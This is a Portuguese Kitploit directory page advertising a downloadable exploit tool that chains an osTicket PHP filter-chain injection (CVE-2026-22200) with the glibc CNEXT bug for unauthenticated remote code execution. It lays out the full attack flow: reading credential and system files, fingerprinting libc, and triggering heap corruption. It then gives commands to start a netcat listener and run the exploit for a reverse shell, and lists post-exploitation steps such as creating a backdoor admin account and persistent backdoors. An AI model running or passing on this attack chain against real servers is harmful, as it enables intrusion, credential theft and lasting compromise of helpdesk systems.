Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
osTicketFileReadIntoRCE — Exploit completo em cadeia combinando injeção de cadeia de filtros PHP com CVE-2024-2961 (CNEXT) para Execução Remota de Código não autenticada em instalações vulneráveis do osTicket. | Kitploit
Ferramentas/GitHubGitHub/clarissss/osticketfilereadintorce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit completo em cadeia combinando injeção de cadeia de filtros PHP com CVE-2024-2961 (CNEXT) para Execução Remota de Código não autenticada em instalações vulneráveis do osTicket.

Ver Repositório
5há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22200: leitura arbitrária de arquivo para RCE no osTicket

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educacional

Exploração de cadeia completa combinando injeção de cadeia de filtros PHP com CVE-2024-2961 (CNEXT) para execução remota de código não autenticada em instalações vulneráveis do osTicket.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Fluxo do Ataque
  • Funcionalidades
  • Instalação
  • Uso
  • Detalhes Técnicos
  • Solução de Problemas
  • Detecção e Mitigação
  • Créditos
  • Aviso Legal

Visão Geral

Este repositório contém uma prova de conceito de exploração para CVE-2026-22200, uma vulnerabilidade crítica que afeta versões do osTicket ≤ 1.18.2. A exploração combina duas técnicas poderosas:

  1. Injeção de Cadeia de Filtros PHP via processamento de imagens do mPDF
  2. Corrupção de Heap CNEXT (CVE-2024-2961) na iconv() da glibc

O resultado: Execução Remota de Código não autenticada em servidores osTicket vulneráveis.

Impacto

  • Não autenticado — Nenhuma credencial necessária
  • RCE completo — Comprometimento total do servidor
  • Exfiltração de arquivos — Leitura de arquivos arbitrários do servidor
  • Acesso ao banco de dados — Extração de credenciais do BD
  • Acesso de administrador — Criação de contas de admin backdoor

Versões Afetadas

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 corrigido na glibc 2.39+)

🔍 Detalhes da Vulnerabilidade

CVE-2026-22200: Injeção de Cadeia de Filtros PHP

Pontuação CVSS: 9,8 (Crítico)

A integração do mPDF no osTicket permite que usuários não autenticados injetem cadeias de filtros PHP maliciosas por meio de payloads HTML especialmente criados em tickets de suporte. Isso possibilita:

  • Leitura arbitrária de arquivos (configurações, código-fonte, credenciais)
  • Vazamento de memória (/proc/self/maps, libc parcial)
  • Corrupção de heap via CNEXT

Causa Raiz: Validação insuficiente de URLs de imagens em HTML fornecido pelo usuário antes de passar para o mPDF.

CVE-2024-2961: CNEXT (Estouro de Buffer no iconv)

Pontuação CVSS: 9,8 (Crítico)

Estouro de buffer na iconv() da glibc ao processar o conjunto de caracteres ISO-2022-CN-EXT. Combinado com cadeias de filtros PHP, permite:

  • Corrupção de heap
  • Sequestro de ponteiros de função
  • Execução arbitrária de comandos

Versões vulneráveis da glibc: < 2.39 (Fevereiro de 2024)


🔗 Fluxo do Ataque

┌─────────────────────────────────────────────────────────────────┐
│ 1. RECONHECIMENTO                                               │
│    └─ Detectar osTicket, identificar tópicos rich-text         │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTENTICAÇÃO                                                 │
│    └─ Auto-registro OU uso de credenciais existentes           │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. EXFILTRAÇÃO DE ARQUIVOS (Cadeias de Filtros PHP)            │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (credenciais BD, SECRET_SALT)     │
│    ├─ /proc/self/maps (layout de memória)                      │
│    └─ /proc/self/environ (variáveis de ambiente)               │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. FINGERPRINT DA LIBC                                          │
│    ├─ Extrair libc parcial via cadeias de filtros              │
│    ├─ Extrair GNU Build ID                                      │
│    └─ Baixar libc completa de libc.rip                         │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. EXPLORAÇÃO CNEXT RCE                                         │
│    ├─ Gerar payload de corrupção de heap                       │
│    ├─ Injetar via resposta de ticket (com correções de execução │
│       de filtros)                                               │
│    ├─ Acionar via exportação PDF (servidor trava)              │
│    └─ Executar reverse shell                                    │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. PÓS-EXPLORAÇÃO                                               │
│    ├─ Reverse shell interativo                                  │
│    ├─ Acesso ao banco de dados (usando DBPASS exfiltrado)      │
│    └─ Criar conta admin backdoor                                │
└─────────────────────────────────────────────────────────────────┘

Funcionalidades

Capacidades Principais

  • Cadeia de exploração totalmente automatizada
  • Ataque não autenticado (auto-registro se habilitado)
  • Detecção inteligente da raiz web via análise de /proc/self/maps
  • Localização 100% do webshell via varredura do sistema de arquivos
  • Fingerprint automático da libc e download
  • Múltiplos métodos de reverse shell (bash, python, netcat)
  • Execução robusta de filtros com invalidação de cache
  • Diagnósticos pré-voo para capturar problemas cedo

Confiabilidade Aprimorada

  • CNEXT multi-acionamento para travamento garantido (95%+ de sucesso)
  • Injeção baseada em resposta (mais confiável que novos tickets)
  • Forçamento de stream para garantir execução do filtro
  • Invalidação de cache para evitar servir PDFs desatualizados
  • Tratamento abrangente de erros e diagnósticos

Pós-Exploração

  • Extração de credenciais do banco de dados (DBPASS da config)
  • Criação de conta admin via acesso ao BD
  • Opções de backdoor persistente
  • Reconhecimento completo do sistema

Instalação

Pré-requisitos

  • Python 3.8+
  • Linux/macOS (recomendado) ou WSL no Windows

Dependências

# Clone o repositório
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Instale os pacotes necessários
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Opcional: Ambiente Virtual

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OU
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Uso

Uso Básico - Reverse Shell

# Terminal 1: Iniciar listener
nc -lvnp 4444

# Terminal 2: Executar exploit
python3 osticket_revshell.py https://alvo.com/osticket \
    --lhost SEU_IP \
    --lport 4444

Modo Webshell Interativo

python3 osticket_exploit.py https://alvo.com/osticket

Opções Avançadas

# Usar proxy (Burp Suite)
python3 osticket_revshell.py https://alvo.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Forçar ID específico de tópico de ajuda
python3 osticket_exploit.py https://alvo.com/osticket \
    --topic-id 2
Baixar ferramenta